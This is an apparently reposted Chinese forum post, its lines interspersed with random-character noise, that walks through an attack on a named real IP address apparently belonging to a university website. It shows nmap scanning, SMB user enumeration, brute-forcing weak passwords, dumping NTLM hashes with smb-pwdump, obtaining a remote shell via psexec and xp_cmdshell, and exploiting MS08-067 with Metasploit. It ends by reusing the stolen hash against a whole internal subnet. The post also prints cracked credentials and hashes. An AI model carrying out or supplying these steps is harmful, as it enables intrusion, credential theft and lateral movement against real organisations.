广西师范网站http://202.103.242.241/: J0 r/ }. N/ E; L: {% ]
0 \7 e* C( m6 H. q, v" y
root@bt:~# nmap -sS -sV 202.103.242.241
0 ^5 k) [* K0 x# h- P/ S+ U0 U5 j$ B+ I. z( a) z# T
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST0 P! k2 u$ n2 v3 g
, o' K5 ?! `* u* kNmap scan report for bogon (202.103.242.241)2 v T. v9 n- m+ P, E# ?& T, L
7 u$ d. M1 x7 o- c- d
Host is up (0.00048s latency).
: A. U3 S" M: W6 c" v+ e' s" T6 `9 K! u2 K" V
Not shown: 993 closed ports7 l! ?# a! e4 n0 O
: d$ V2 U5 q) `
PORT STATE SERVICE VERSION
5 o4 Y) _; i' ~2 ^! S, ?: V8 q( O+ l4 S" j7 w* K0 u! }& O9 L
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
l- i! @4 z4 t
+ X5 Z0 p& B8 p% q139/tcp open netbios-ssn
% }4 w; q9 |4 {- M7 N3 A) y8 f1 v8 H1 q, r$ ?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
$ N9 P. I' P: V$ k
% @% q$ d5 @+ M0 M/ f1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 f) c) S5 d$ q- @; y6 E
, v" Z% x! s) K+ D) ?& u
1026/tcp open msrpc Microsoft Windows RPC
Y! G9 s! m- G+ p! W
0 L6 N; w' s$ v2 y$ e0 x/ T3372/tcp open msdtc?
3 E6 S* [! [$ u& H+ v! x. d
/ m! m2 g- W) m" s( l3389/tcp open ms-term-serv?. j% ^7 F# @8 i! J$ Q& e" y
4 j1 S7 Y1 K; w- L( d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :) B$ F8 U6 w5 t! L4 `5 y! Q
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
4 g8 D/ F% P: x, R
/ r. T! L5 \: w) J% ySF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions$ ]( \# A( `* V8 ]* a
0 [" v) z6 z0 b3 y4 Z' USF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
$ J. X* @7 z8 B& c1 q% ?" @
0 Q- p3 }/ f; f: G3 r( `* J. x- ySF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
: Q5 P' U, F% W* w7 n5 |6 x7 A$ T8 Z1 v8 z( r: P3 o9 x
SF:ptions,6,”hO\n\x000Z”);& }7 Y4 R- O5 C, {
* M& d3 _% V* p7 e7 x! LMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, D0 \" a [! H0 Z9 L* b, G% F) n& U) k
Service Info: OS: Windows
7 B$ H. F; i+ U! s( [- W \0 F: Y+ T
0 T+ P. O( ]* O5 X9 Q k& {Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
8 I. N7 A6 v" e0 ]( h# F5 z
4 I8 Q8 I" [4 J( r- K+ d* C2 iNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
3 ?( L+ @" P1 Y9 a7 Z6 Q) H' L6 ~* B
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
3 ?& d: W9 ^9 @
0 _- _3 t# t7 `: m2 s) X-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse- z8 i! ^- C; s' a6 v
$ `' S& n" `) G. I g/ P
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
. X& ?, L' }% b- Q; f2 H v, a6 g0 D/ _8 ^4 {) a
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
* E5 \2 b/ L$ y) R$ i3 w, x% [
6 m2 j P. d. C4 x" Q# x- \-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
" s" [9 _+ T6 N6 N' E, \8 G* v9 x) J: f( M6 M7 N
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse9 }) D4 Y: D0 X( a) p* l4 h4 u
2 ~1 V- n1 U7 I
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
1 U9 V. N/ \) _5 Y
0 Z1 l- a; l4 M-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
. c$ p* G1 ?% T
* C; w9 l2 U6 T6 c-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse5 u @- i# Y [( W
2 Y2 x' L! b5 ?7 u& a' C6 ]
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
7 |5 y) N" \: q* R- i" ^ c3 i0 B/ n, {2 o- T- r
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
) p" G) k$ q3 _- J. U6 p# C
/ P1 i# y9 a6 O-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
* e! ]4 n% a3 |( j% M- m* \/ C$ O* k8 z3 L3 T$ s- w! ?; Z
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse9 j8 M e3 ^( A( [3 g. G
* v1 [6 c/ C% X* K! \& }& \-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse; }0 a% ?. i8 p: R' P% D( y
% i$ o5 a* U* n: v A
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse1 ]7 `( A: ?( Q* t E
$ d, ^. W& W! _' n. V. `
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
4 g& v6 s% l1 n$ o8 _6 x" O# o
/ t2 W% |4 H( mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
* e9 v( V9 j# P: `- O# A8 [ { v2 b0 {! j" o$ C
//此乃使用脚本扫描远程机器所存在的账户名
0 h5 d' G1 ?1 F% p. r+ E# X9 @: d/ I6 a( ]9 u5 m/ |! c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST" Z! O: V4 e3 _( r2 Q! g4 a
# m4 Y/ H* e7 J/ p: t V
Nmap scan report for bogon (202.103.242.241)
7 B N, ?2 ~" m$ u3 X6 S: a: F) b# \' B
Host is up (0.00038s latency).
" A% G8 d& J8 B* n/ F% c6 `2 r) A$ i* K7 Z
Not shown: 993 closed ports
1 L" Y& c; R: L: J2 T; ?: y- `, w, |1 i# C! r1 i) l5 F( m
PORT STATE SERVICE6 X N' q. v* u2 n
1 _9 [5 o/ |* r$ V; I! s4 ^
135/tcp open msrpc/ a- X$ ^2 h/ `! y G4 W9 N
, F% n8 r _. k2 q1 G6 e. \
139/tcp open netbios-ssn! }4 j8 q8 G# ^! _: M" ]
- ~! P5 f3 E4 S2 R6 N" R
445/tcp open microsoft-ds& M* Y9 i+ }7 v6 q& h: H! ^
& d0 r/ `( R7 U$ w2 H1025/tcp open NFS-or-IIS: Y; V7 _6 O3 I% k
6 H. d; J5 P( k6 M1026/tcp open LSA-or-nterm _7 X% q% ?) p7 ~
! d7 w, w* Q3 W# d8 r2 y) U
3372/tcp open msdtc
% a. C9 V+ Z8 a% t! u# g/ j2 x, m$ f7 O
3389/tcp open ms-term-serv% g6 ]. o. u7 Z, b3 Y# H8 u5 c; O5 ^
0 R- }* S2 ^0 Q* X+ H% H: ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" A2 {" q. H1 X
! c& o1 F% V7 I/ n$ _9 ]8 l
Host script results:
0 u% d# B3 q6 g; |4 T! [0 f' [$ p4 Y, i* o1 d
| smb-enum-users:
/ g- t& S( d3 b( X- x; i5 E0 r u' v7 N! i, R
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果" A. i. q5 X0 _2 V- r/ S8 P$ t
! X4 \- F! u4 m; L; xNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
5 j3 }) m8 T: u- U1 c |
3 @) I m" E; I rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 3 E+ K' f2 n" u
4 H2 j( C7 D0 S//查看共享
; ^( w' K8 s5 y$ v6 t
6 m! O, Z, D& Z; D5 p! D. YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. N% h' F" k" x' k1 F1 v4 k: u4 V
: U- X4 L& |' iNmap scan report for bogon (202.103.242.241)' c9 u8 \' V _8 D
$ y+ M$ Z8 z- O: i0 K) D7 P
Host is up (0.00035s latency).
8 @+ I6 E, h& c- C
- c9 k7 |4 P# jNot shown: 993 closed ports
# T! T8 q. i4 ]' w) y
l* g- F, c: d5 U& C. B! [PORT STATE SERVICE1 X- E: `) }2 S& @' m: \* }
4 P( m/ H% v: P2 L3 q135/tcp open msrpc
' ]9 t, @6 I1 k9 Q8 m3 K" I3 q. |) F. Q9 G0 T
139/tcp open netbios-ssn7 Q7 [3 u' ~ t( K
# ~4 a4 l. X1 d. j
445/tcp open microsoft-ds1 N$ \# L6 _8 N% T5 [/ s' v- h7 Z
0 p0 b0 I3 B0 u# F2 C1025/tcp open NFS-or-IIS/ ], g% f) [" G) Q8 d, f1 D' k
. {2 h) Y' v! J# ~; g8 } }5 b# C# A
1026/tcp open LSA-or-nterm
2 t4 w* j' l9 p7 Y7 X' c; s* y; _( ?" X6 @) i) m7 H
3372/tcp open msdtc
6 X6 o- ?0 \1 ]6 V* z" j `1 o' W2 f" P2 k" a2 {
3389/tcp open ms-term-serv/ W! U; n+ L# l' m) P9 O
1 s8 A* C/ J6 \! l& z# K
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ L: n3 t0 n- R/ u( P$ [9 M; `8 n' a" R7 N: H% Y4 f
Host script results:
5 @+ _1 x# W% L0 a0 i+ u- [3 y8 x# T e! }& h
| smb-enum-shares:
* O8 v/ x& X/ }: i# c L6 e* `: p( g' M( j% m+ E- s0 v% K: I
| ADMIN$
; c. p' Y7 X1 b5 a% R5 `$ R _9 N! e: t) V0 ?. j g
| Anonymous access: <none>" W3 k( _/ m1 d* z
3 h2 ^6 |, g5 ^) W+ n
| C$6 @4 E* V% B! B7 D3 H2 m
# u, M7 o& l, m| Anonymous access: <none>
# i w" k2 _6 [$ w/ S4 G/ c* k/ ^* ^
| IPC$
- o3 W' r6 c" F1 K6 }0 T# X, y9 J1 o+ K
|_ Anonymous access: READ
3 U) d: i) u: j- U. k8 n* c( U9 x( Y( ~9 Y. p
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' ^* c O! [6 s9 |. v5 f/ z, W# p
% w- k! g4 H6 [* }9 ~4 J# croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ( ^& R2 @$ U: A; \
' g8 N5 P! q: K//获取用户密码
8 N* a' b/ |, h) H. a* ^3 ?& i
. ~! V- i9 _& T$ i0 _Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
0 S$ o, c5 x7 u& M9 Q
# Q$ V( F& i) k% g% KNmap scan report for bogon (202.103.242.2418)
( ^& z. p. _# n0 a) Q) n
0 B! @1 ], P) j q6 w$ @% q- x) qHost is up (0.00041s latency).. _# J( m( x, b6 B8 M. f2 \
) O/ T7 D1 i' s' ?4 ANot shown: 993 closed ports) W# L9 A3 E7 w% R
# F: x a; d8 R6 J$ Y) f" q
PORT STATE SERVICE3 k" `+ N1 e" M* h0 q3 s
0 o( h, o; q: b) D8 s9 z. H135/tcp open msrpc
4 J& a% X+ D1 d) P
( [0 p; A9 T" A. e9 Y e. ~139/tcp open netbios-ssn
; { n3 z# S: ^! p
' V+ l" K, o8 P T445/tcp open microsoft-ds
# s, g3 M- b1 ~; ?9 D I- ?
2 w A; J5 E+ ?1025/tcp open NFS-or-IIS
1 e8 ~8 p' E# e2 B5 B( R3 n2 w# U2 \9 ^5 i! M* ?; l+ ~. x
1026/tcp open LSA-or-nterm
% }6 I5 |; v6 B% d: F
" m. d( k+ o5 |3372/tcp open msdtc6 g" b8 f) [/ W1 x- D) L/ X
0 ^6 r$ I% Y" W$ q
3389/tcp open ms-term-serv4 } Z" G z+ G& F6 S, j6 K
4 n2 p Y8 a3 X6 l' P7 {" mMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) S! [; b2 n; Y4 r
! x" y4 i1 j% p: M3 K5 O
Host script results:( J7 |+ P" t# x& z! I c" s
[6 T; i# K- Y2 B| smb-brute:
. A4 U; ^- l" s- j5 x( a$ }' f' V* ]% E1 Y
administrator:<blank> => Login was successful
1 J1 L) U* P' W; K8 H! Y' u+ ]
& a6 R: o7 i& F) T6 J+ I2 G|_ test:123456 => Login was successful5 j8 `" {' W& T7 s! O' T3 p1 k
2 Z8 g7 O9 V7 U Y& N: [0 GNmap done: 1 IP address (1 host up) scanned in 28.22 seconds* |7 W$ q# |8 z$ W& O# G) W5 j5 R
! N" y. P) u! I: ?* i; Troot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash/ u; q/ f3 D+ _ }
2 N5 A( B; V6 x. G
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
% Q1 f$ Q3 R) F- ^. s" h
' _% _8 R# p9 |+ p L$ E' L$ n! l+ J! uroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
' ~. I, z4 W' Z" n7 _+ N3 @
% T* K. K5 v2 uroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
5 d- y8 J$ v; i0 T5 i+ m/ j7 g) }0 Q1 ?1 a8 N5 g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
5 f; U5 W3 r2 \4 |+ Q
8 t* L) l' i/ R" ^' g3 F; _2 SNmap scan report for bogon (202.103.242.241)* n) k: a% ~0 r; J$ G
- `/ m5 P1 |9 B+ E# ^ p4 M
Host is up (0.0012s latency).4 T! {! X$ f: q; Y( j4 w+ V
: @% g; R* p2 U% P
PORT STATE SERVICE" C! [: r6 u% r( V
. U) E- Y0 G: N+ o/ |1 w _- z135/tcp open msrpc
$ o" M! c* h1 a1 T
6 Y& P- X1 v8 j5 n+ z139/tcp open netbios-ssn1 ^0 B' `" Q5 K
- R6 _" {# {& K' y: \; A- |' `
445/tcp open microsoft-ds& N3 I) Z' R5 n6 Z& d5 w; x: S( U
. m3 c# S& H/ A5 O9 O! j
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( r6 I9 B+ Q/ d
. {9 p n0 ]) `) S( N6 k" jHost script results:
: {0 N: j# Y$ t' i( z0 i+ ]3 T
) l9 a) f: V' S- N g3 w) r5 d* l4 `| smb-pwdump:% q. U" L8 Y- l0 Y. u
' S+ a* u1 C9 L% h0 N| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
/ b2 q5 g" P% R2 d! @
r. J, e- I+ [/ ^+ b| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
) ?% M( t K& o6 ^' u" t
; j0 b- v4 H, P6 @" {| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D46 g% |3 k6 m+ C; V: W+ o9 K; o
1 H9 @! B. Q+ g3 s. a9 w4 M|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
, }! j% I8 _. U( a; d3 t1 y( _' P" B' r, {. J/ W
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds; i2 \( d$ D$ U _/ k
& A- d. ~- m; V1 GC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell% U+ X: Y2 V7 @, n8 C3 ]- A
, E! Z3 @* S# X* ?; X-p 123456 -e cmd.exe5 _, d) e) ^ D
/ u) S- r6 \1 E$ S9 b8 F! ^! UPsExec v1.55 – Execute processes remotely1 u0 H3 ~6 p5 v9 d' n9 l! N
( ?- j& U; r( [* f+ J* wCopyright (C) 2001-2004 Mark Russinovich, L& \0 L0 W1 M# G+ V8 E
: a4 t1 V6 u, ], a6 P
Sysinternals – www.sysinternals.com
# ~+ e4 w) |" a1 d' _$ l _
% A: {! b/ D3 d3 y" s. @$ EMicrosoft Windows 2000 [Version 5.00.2195]! L, A; e* F" E. _4 W0 J
) l+ C0 |/ [5 H8 V5 O' h" l
(C) 版权所有 1985-2000 Microsoft Corp.
% V; {0 n; x8 J) q" ^2 I8 t2 ]4 |' P* O5 k6 b! ?
C:\WINNT\system32>ipconfig
7 u, s/ y+ b N3 c, S8 W- ^* ?
& d+ q. w& ]" X2 z7 e2 |Windows 2000 IP Configuration" m! h/ V, i: B5 D8 z0 N
7 S! Q; b( d7 s! wEthernet adapter 本地连接:
' Q/ w8 t8 {0 B0 w( |( t! e( \0 }
Connection-specific DNS Suffix . :
* d' X' L1 G! P/ M5 @0 f
! O/ P; Y$ C3 t1 n- NIP Address. . . . . . . . . . . . : 202.103.242.241; \5 N8 \' l5 G, x0 t
0 l( p% z( v) u9 k; G- T8 B/ F( KSubnet Mask . . . . . . . . . . . : 255.255.255.0
2 Y5 Y1 _7 @6 x2 i) z
0 T1 p7 y% C( |; FDefault Gateway . . . . . . . . . : 202.103.1.1
1 g: w) j7 m4 [ @5 N6 r' L& h8 h% a2 w1 k
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
1 k$ V8 c O0 | ?
+ E) @0 l% @7 D Z6 C5 T# b; Droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞( K* ^' U( J! ^7 T0 \
* K3 [# X" @; E7 R& H
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST \; t- u( d$ S v
6 L5 o' k) l6 G8 h( v. i
Nmap scan report for bogon (202.103.242.241)" U0 H9 e" k6 m F$ e
' M/ [+ K: U7 M1 C6 SHost is up (0.00046s latency).) u& @8 ]; f4 h$ L
' M. O1 l1 ]4 x4 |Not shown: 993 closed ports1 s9 B' I/ S. |
: K# b3 p2 h& q5 T3 d' s& F3 f
PORT STATE SERVICE; ~& O: N' _9 p6 l
5 ]) I1 i6 i# J _! n
135/tcp open msrpc
9 r: n% F( C2 n* R1 ]
3 ?2 v: t3 Q2 K( ^( i+ m! {1 `139/tcp open netbios-ssn y/ {* X# q0 w! }, _5 K
+ }" e5 U0 }+ x9 R5 N445/tcp open microsoft-ds
! G8 x' q3 G7 W$ y( {& i3 w% R. s$ k& {, M) e( A2 Y% j$ l2 {
1025/tcp open NFS-or-IIS
0 k3 ]. k( ~1 j1 u0 c9 V# l
: B7 \2 |6 T+ u9 ?1026/tcp open LSA-or-nterm
! V$ ?# R4 _) ^$ j7 p: I {, h7 F1 p; M
3372/tcp open msdtc! K! \: l8 K3 ?" ~) A4 R+ B3 Y2 D
! G7 f7 f& P+ v
3389/tcp open ms-term-serv7 R5 x. {: z& N% T7 _) ]
: V5 k% X# P8 B- C. sMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); p( p. w" \4 k, `* l0 L: I* X. G
, M% G) R: ]1 q
Host script results:3 \1 U1 i% x4 O9 L/ }( L
; V& h( Z5 q9 W1 z( Z- P| smb-check-vulns:
! P3 k! r0 M( B1 v/ D4 [- V6 }- A Z" T+ ?& p7 Y
|_ MS08-067: VULNERABLE, H4 F7 d$ Y& X! y
* c4 f7 ` D( g0 MNmap done: 1 IP address (1 host up) scanned in 1.43 seconds( s8 ]+ {8 j6 O1 O& T( m u2 m- f
7 `0 g7 \: U: e( sroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出& \, c9 N& C" y' L6 e! x
/ i) d2 J. Y9 n* A# Bmsf > search ms08
h( ~) w5 H& q% z X) e, u& X# Q$ g
msf > use exploit/windows/smb/ms08_067_netapi9 T/ ~5 x6 `* s" o7 e n9 v. P
$ p7 l( p0 ?' |5 C3 J. b4 I- q
msf exploit(ms08_067_netapi) > show options
( Z1 k5 R+ P; J+ j4 h( O$ S& c9 P5 N) P+ i# s
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2415 Q9 F& S) N9 ?. k
W8 x; \' ^; Q! Q6 g1 i5 C1 [
msf exploit(ms08_067_netapi) > show payloads
; _: q, u" i0 M; A
; F# v) i/ ~2 T* @1 qmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+ ]: o |% Y. i# t; J% W4 b, H6 \$ t% H) i$ }
msf exploit(ms08_067_netapi) > exploit
. ], ]2 N5 E3 v
* {" D0 E' ^: o2 Cmeterpreter >- c" \. D7 ]: @- j0 b0 V
* z' r4 P) m: n8 W4 t2 f- XBackground session 2? [y/N] (ctrl+z)/ I$ _- l( \5 F( P4 V9 N' u
0 f m) t# T5 ^7 Dmsf exploit(ms08_067_netapi) > sessions -l' j( e" E9 y- }; X# z
. |9 S* S- }1 S1 z& D3 Nroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt2 i$ e9 D" _* \3 Z: ^6 k8 o
! R4 q/ I5 D( ^2 w, M; |+ n5 V- x, l; Etest
9 X* Q+ i# Q+ W/ ]" t, \
2 L+ \7 x9 K5 \0 }8 i* m2 tadministrator3 p6 e2 d1 k3 |6 I
$ r3 }$ c# Q2 c, |- a4 A6 P
root@bt:/usr/local/share/nmap/scripts# vim password.txt) ?: l' x) Z1 w: ^
2 q6 r7 W/ ?( D4 ^2 V; W
44EFCE164AB921CAAAD3B435B51404EE
# s& j% n6 l) }* U0 ^" D4 c" `4 J) h, J3 z: k( O/ s9 l
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
: M. \& I. j/ o4 |9 L( r7 ` G0 @% t; r" {. x
//利用用户名跟获取的hash尝试对整段内网进行登录
o# x9 |3 u8 Q+ Q: _$ ^
9 J U: Q! B" H2 W5 ^# u( iNmap scan report for 192.168.1.105
0 {+ O# w0 ?% T2 u* W( _- D, L% d
+ y: K' {8 S4 t; oHost is up (0.00088s latency).
7 l; ^) A/ A, ]. c: I: q5 w' n
3 s9 p! f" L% E4 m7 F% VNot shown: 993 closed ports6 m0 o5 `0 F4 {8 t( Q
0 v. k+ J) q7 D
PORT STATE SERVICE W- \+ X9 H& i$ Q
: C. G/ `6 o: f
135/tcp open msrpc
6 ~) d# n- _! w6 x d1 q2 M X O9 x- E
139/tcp open netbios-ssn# K. V x. ~6 F# h* U( m$ Z; G8 U
: F, c: n1 O- i5 w
445/tcp open microsoft-ds0 w9 ?1 @3 u/ a% p3 G6 a+ u0 ^
) m& C; X/ O/ Q* m& X6 g# v1025/tcp open NFS-or-IIS
9 j N1 f$ D" v- G9 b8 L Q% S' r9 _6 Y! S6 s% ^( z
1026/tcp open LSA-or-nterm; q+ K5 D( p* N9 g5 W5 f
" T8 J, f \7 d3372/tcp open msdtc @ b/ e! \; w( R( k1 Q- }
0 G( t3 X" O8 d' }; j" q! ^3389/tcp open ms-term-serv* w! _8 Q% Q" G& B+ r
+ i; Z r, Q, o6 h' O- p6 o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- [: J- a4 D7 K- P6 M5 W
& C- r J7 s% `) h' m7 ]Host script results:
9 v# C2 {' X( z2 R6 u. S, M8 q% h4 z, W, M+ i. F, g/ n2 L2 G) Z! ^' W
| smb-brute:
: W$ r9 x5 g0 I" X' ]$ ~- k% F( _. q a2 F2 f- S
|_ administrator:<blank> => Login was successful5 q' S$ g# o- t8 C
" }1 G0 n/ r/ y
攻击成功,一个简单的msf+nmap攻击~~·. p8 j! v) u/ ~$ @% x
* v6 }3 n# b9 H; C; l! W. v1 t% r |
发表于 2012-12-4 12:46:42
收藏
支持
反对